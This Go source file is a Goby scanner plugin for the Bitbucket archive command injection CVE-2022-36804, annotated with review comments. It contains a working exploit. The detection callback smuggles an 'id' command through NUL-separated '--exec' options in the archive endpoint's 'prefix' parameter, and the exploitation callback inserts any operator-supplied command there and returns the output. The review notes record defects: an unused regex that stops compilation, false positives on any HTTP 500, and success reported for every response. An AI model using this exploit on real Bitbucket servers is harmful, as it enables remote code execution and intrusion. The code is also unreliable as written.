package exploits
import (
"regexp"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
)
// init registers one scanner plugin with ExpManager: a JSON metadata record
// (expJson), a detection callback and an exploitation callback, all passed to
// NewExploit. The record's Name identifies the issue as the Atlassian
// Bitbucket archive command injection, CVE-2022-36804.
func init() {
// expJson is the plugin metadata. Its Chinese Description says that the flaw
// was introduced in Bitbucket Server / Data Center 7.0.0, that several API
// endpoints are affected by command injection, that triggering it needs
// access to a public project or read permission on a private one, and that
// versions 7.0 through 8.3 are affected.
// NOTE(review): Recommendation, Impact, References, CVEIDs, CVSSScore and the
// EN Description are all empty, so a finding from this plugin carries no
// remediation guidance and no machine-readable CVE id for correlation.
// Populate them (remediation: upgrade to a fixed release per the vendor
// advisory) before relying on this plugin's reports.
// The ScanSteps/ExploitSteps entries have empty "uri" values and no checks;
// the requests this file actually sends are built in the two callbacks below.
expJson := `{
"Name": "Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804",
"Description": "<p>Atlassian 发布安全公告,披露了 Bitbucket Server 和 Data Center 在 7.0.0 版中引入了一个严重安全漏洞。</p><p>Bitbucket 是 Atlassian 公司提供的一个基于 web 的版本库托管服务,支持 Mercurial 和 Git 版本控制系统。支持私有化部署,根据国内某资产测绘平台数据显示,近一年全球有超过 1w+ 相关服务对外开放。</p><p>官方漏洞公告中描述 Bitbucket Server 和 Data Center 多个 API 端点存在命令注入漏洞,漏洞触发条件是攻击者具备公开项目的访问权限或者私有项目的可读权限,影响版本从 7.0 到 8.3</p>",
"Product": "",
"Homepage": "",
"DisclosureDate": "2022-11-02",
"Author": "",
"FofaQuery": "app=\"Bitbucket\"",
"GobyQuery": "app=\"Bitbucket\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "command",
"type": "input",
"value": "id",
"show": "id"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [],
"VulType": [],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804",
"Product": "",
"Description": "<p>Atlassian 发布安全公告,披露了 Bitbucket Server 和 Data Center 在 7.0.0 版中引入了一个严重安全漏洞。</p><p>Bitbucket 是 Atlassian 公司提供的一个基于 web 的版本库托管服务,支持 Mercurial 和 Git 版本控制系统。支持私有化部署,根据国内某资产测绘平台数据显示,近一年全球有超过 1w+ 相关服务对外开放。</p><p>官方漏洞公告中描述 Bitbucket Server 和 Data Center 多个 API 端点存在命令注入漏洞,漏洞触发条件是攻击者具备公开项目的访问权限或者私有项目的可读权限,影响版本从 7.0 到 8.3</p>",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
},
"EN": {
"Name": "Atlassian Bitbucket archive RCE CVE-2022-36804",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
// Register the plugin under the name returned by goutils.GetFileName().
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
// Detection callback: sends one GET to the repository archive REST endpoint
// and returns true when the server answers with HTTP 500.
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
// The project key and repository slug are hard-coded.
// NOTE(review): a negative result from this check is therefore not evidence
// that a host is patched; it may only mean this one path does not apply.
// For defenders, the observable in access logs is an archive request whose
// "prefix" parameter contains an encoded NUL (%00) followed by option-like text.
uri := "/rest/api/latest/projects/RIS-PRO/repos/ris-mysql-interface/archive?filename=pBwTw&at=pBwTw&path=pBwTw&prefix=ax%00--exec=%60id%60%00--remote=origin"
cfg := httpclient.NewGetRequestConfig(uri)
// Certificate validation is switched off and redirects are not followed
// for this request.
cfg.VerifyTls = false
cfg.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil {
// NOTE(review): re is compiled but never used. The Go compiler rejects an
// unused local ("declared and not used"), and the verdict below does not
// look at the response body at all.
re := regexp.MustCompile(`"uid=.*\(([a-z]+)\):"`)
// Any HTTP 500 is reported as vulnerable.
// NOTE(review): this is prone to false positives, since an unrelated server
// error on this path yields the same verdict; presumably the regex above was
// meant to confirm the finding from the body. Confirm intent.
return resp.StatusCode == 500
}
// A transport error is treated as "not vulnerable".
return false
},
// Exploitation callback: reads the operator-supplied "command" parameter,
// places it in the same archive request and copies the raw response body
// into the result.
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
// NOTE(review): unchecked type assertion; this panics if "command" is
// missing from ss.Params or is not a string.
cmd := ss.Params["command"].(string)
uri := "/rest/api/latest/projects/RIS-PRO/repos/ris-mysql-interface/archive?filename=pBwTw&at=pBwTw&path=pBwTw&prefix=ax%00--exec=%60" + cmd + "%60%00--remote=origin"
cfg := httpclient.NewGetRequestConfig(uri)
// Same transport settings as the detection callback: no certificate
// validation, no redirect following.
cfg.VerifyTls = false
cfg.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil {
// NOTE(review): Success is set for every response that arrives without a
// transport error, whatever its status code or body, so a 404 or a login
// page is still reported as a successful result. Reports built on this
// flag overstate confirmed exposure.
resinfo := resp.RawBody
expResult.Output = resinfo
expResult.Success = true
}
return expResult
},
))
}